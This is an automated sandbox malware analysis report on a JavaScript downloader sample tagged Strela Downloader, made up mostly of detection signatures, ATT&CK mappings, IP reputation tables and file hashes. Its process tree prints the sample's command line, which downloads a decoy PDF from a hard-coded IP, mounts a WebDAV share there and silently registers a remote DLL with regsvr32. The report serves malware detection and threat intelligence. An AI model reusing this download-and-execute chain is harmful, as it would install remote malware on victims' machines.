Windows
Analysis Report
348426869538810128.js
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- wscript.exe (PID: 6424 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\34842 6869538810 128.js" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 7044 cmdline:
"C:\Window s\System32 \cmd.exe" /c powersh ell.exe -C ommand "In voke-WebRe quest -Out File C:\Us ers\user\A ppData\Loc al\Temp\in voice.pdf http://193 .143.1.205 /invoice.p hp"&&start C:\Users\ user\AppDa ta\Local\T emp\invoic e.pdf&&cmd /c net us e \\193.14 3.1.205@88 88\davwwwr oot\&&cmd /c regsvr3 2 /s \\193 .143.1.205 @8888\davw wwroot\263 2327912608 8.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1948 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1936 cmdline:
powershell .exe -Comm and "Invok e-WebReque st -OutFil e C:\Users \user\AppD ata\Local\ Temp\invoi ce.pdf htt p://193.14 3.1.205/in voice.php" MD5: 04029E121A0CFA5991749937DD22A1D9) - Acrobat.exe (PID: 3108 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\Acrobat .exe" "C:\ Users\user \AppData\L ocal\Temp\ invoice.pd f" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C) - AcroCEF.exe (PID: 3688 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ba ckgroundco lor=167772 15 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE) - AcroCEF.exe (PID: 6424 cmdline:
"C:\Progra m Files\Ad obe\Acroba t DC\Acrob at\acrocef _1\AcroCEF .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --log-seve rity=disab le --user- agent-prod uct="Reade rServices/ 23.6.20320 Chrome/10 5.0.0.0" - -lang=en-U S --user-d ata-dir="C :\Users\us er\AppData \Local\CEF \User Data " --log-fi le="C:\Pro gram Files \Adobe\Acr obat DC\Ac robat\acro cef_1\debu g.log" --m ojo-platfo rm-channel -handle=21 08 --field -trial-han dle=1640,i ,360210874 4549472404 ,159575791 2571781731 9,131072 - -disable-f eatures=Ba ckForwardC ache,Calcu lateNative WinOcclusi on,WinUseB rowserSpel lChecker / prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 6084 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_StrelaDownloader | Yara detected Strela Downloader | Joe Security |
System Summary |
---|
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems), Alejandro Houspanossian ('@lekz86'): |
Source: | Author: Florian Roth (Nextron Systems), Hieu Tran: |
Source: | Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Source: | Author: frack113: |
Source: | Author: vburov: |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Click to jump to signature section
Software Vulnerabilities |
---|
Source: | Argument value : | Go to definition | ||
Source: | Argument value : | Go to definition |
Source: | Child: |
Source: | IP Address: | ||
Source: | IP Address: |
Source: | ASN Name: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Spam, unwanted Advertisements and Ransom Demands |
---|
Source: | File source: |
System Summary |
---|
Source: | COM Object queried: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Initial sample: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Data Obfuscation |
---|
Source: | Anti Malware Scan Interface: |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | COM call: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Stealing of Sensitive Information |
---|
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 32 Scripting | Valid Accounts | 1 Command and Scripting Interpreter | 32 Scripting | 11 Process Injection | 11 Masquerading | OS Credential Dumping | 1 Network Share Discovery | Remote Services | Data from Local System | Data Obfuscation | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 131 Virtualization/Sandbox Evasion | LSASS Memory | 11 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | Junk Data | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 131 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 122 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
162.159.61.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false | |
193.143.1.205 | unknown | unknown | 57271 | BITWEB-ASRU | true |
IP |
---|
127.0.0.1 |
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1588078 |
Start date and time: | 2025-01-10 21:04:34 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 57s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 17 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | 348426869538810128.js |
Detection: | MAL |
Classification: | mal100.rans.spyw.expl.evad.winJS@27/61@0/3 |
EGA Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 2.23.240.205, 50.16.47.176, 18.213.11.84, 34.237.241.83, 54.224.241.105, 2.23.242.162, 23.209.209.135, 199.232.210.172, 2.16.168.107, 2.16.168.105, 23.40.179.48, 23.40.179.15, 23.40.179.71, 23.40.179.9, 23.40.179.21, 23.40.179.56, 23.40.179.69, 192.168.2.6, 13.107.246.45, 4.245.163.56, 104.126.112.182
- Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description |
---|---|---|
15:05:30 | API Interceptor | |
15:05:34 | API Interceptor | |
15:05:34 | API Interceptor | |
15:05:41 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
162.159.61.3 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | HTMLPhisher | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | StormKitty | Browse | |||
Get hash | malicious | Branchlock Obfuscator | Browse | |||
193.143.1.205 | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | KnowBe4 | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | MassLogger RAT | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
BITWEB-ASRU | Get hash | malicious | Strela Downloader | Browse |
| |
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
| ||
Get hash | malicious | Strela Downloader | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.726319634527019 |
Encrypted: | false |
SSDEEP: | 1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH01:9JZj5MiKNnNhoxug |
MD5: | 86D4FFF10A0E6796FB906BFD1D7A904A |
SHA1: | B31D2C8CD5BCEB839CD5D7791BCF9D7F38C279FB |
SHA-256: | F9B0790079155FA0FCAA49C5617753E1021FC518200672BEDA350A228EF51B0B |
SHA-512: | 100FE2D173330439BD73563632B1823669CC5743203DF480FB60D56AA13883EAE1B44C297586C8A927047CA7B7F43BA723FAC7E46FFF405B9B3392818A93EE2E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
